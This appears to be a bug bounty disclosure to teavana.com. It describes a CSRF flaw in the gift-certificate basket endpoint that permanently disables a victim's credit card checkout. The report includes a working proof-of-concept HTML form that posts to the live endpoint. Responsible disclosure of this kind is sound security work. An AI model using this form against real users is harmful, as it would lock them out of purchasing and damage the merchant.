Hello, I have found an extremely interesting issue that can be used to permanently lock a user’s possibility of ever buying anything from teavana.com by removing the credit card payment method.
CSRF snippet
<html>
<head></head>
<body>
<form method="POST" id="GiftCertificateForm" action="http://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/GiftCert-AddToBasket">
<input class="textinput" id="dwfrm_giftcert_purchase_from" type="text" name="dwfrm_giftcert_purchase_from" value="Test whatever" maxlength="2147483647">
<input class="textinput" id="dwfrm_giftcert_purchase_recipient" type="text" name="dwfrm_giftcert_purchase_recipient" value="Test whhhateever" maxlength="2147483647">
<input class="textinput" id="dwfrm_giftcert_purchase_recipientEmail" type="text" name="dwfrm_giftcert_purchase_recipientEmail" value="[email protected]" maxlength="2147483647">
<input class="textinput" id="dwfrm_giftcert_purchase_confirmRecipientEmail" type="text" name="dwfrm_giftcert_purchase_confirmRecipientEmail" value="[email protected]" maxlength="2147483647">
<textarea class="textbox" id="dwfrm_giftcert_purchase_message" name="dwfrm_giftcert_purchase_message" rows="5" cols="50">Bla bla</textarea>
<input class="textinput" id="dwfrm_giftcert_purchase_amount" type="text" name="dwfrm_giftcert_purchase_amount" value="100" maxlength="2147483647">
<input type="submit" value="Send" />
</form>
</body>
</html>
So, I just wanted to find demandware.store hidden links and in my search I stumbled across
http://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/GiftCert-Purchase
From here, one can add custom gift cards in cart with a value between 5 and 5000 euros (or something like that). I have noticed that this is not CSRF protected, but this was a minor issue. Well, it became a serious problem after I noticed that after adding that gift card in my card, I wasn’t able to fully empty my cart anymore and the credit card option was simply not available anymore and I wasn’t able to fulfill any orders. Logging out and in doesn’t do anything. Deleting cart product doesn’t do anything. And because I tested teavana for some time, I know for a fact that the items in cart stay in cart (even after weeks).
So, I have made a new account, added the CSRF POC in a script then tested the flow and it worked. I have made my account unable to buy anything by adding that gift card in cart.
Permanently denying a user the possibility to fulfill with his account any orders is a very big issue (hence the High severity I personally find) and if someone launched an attack against you, you will lose customers and money (not to mention the potentially negative publicity)
Video POC attached.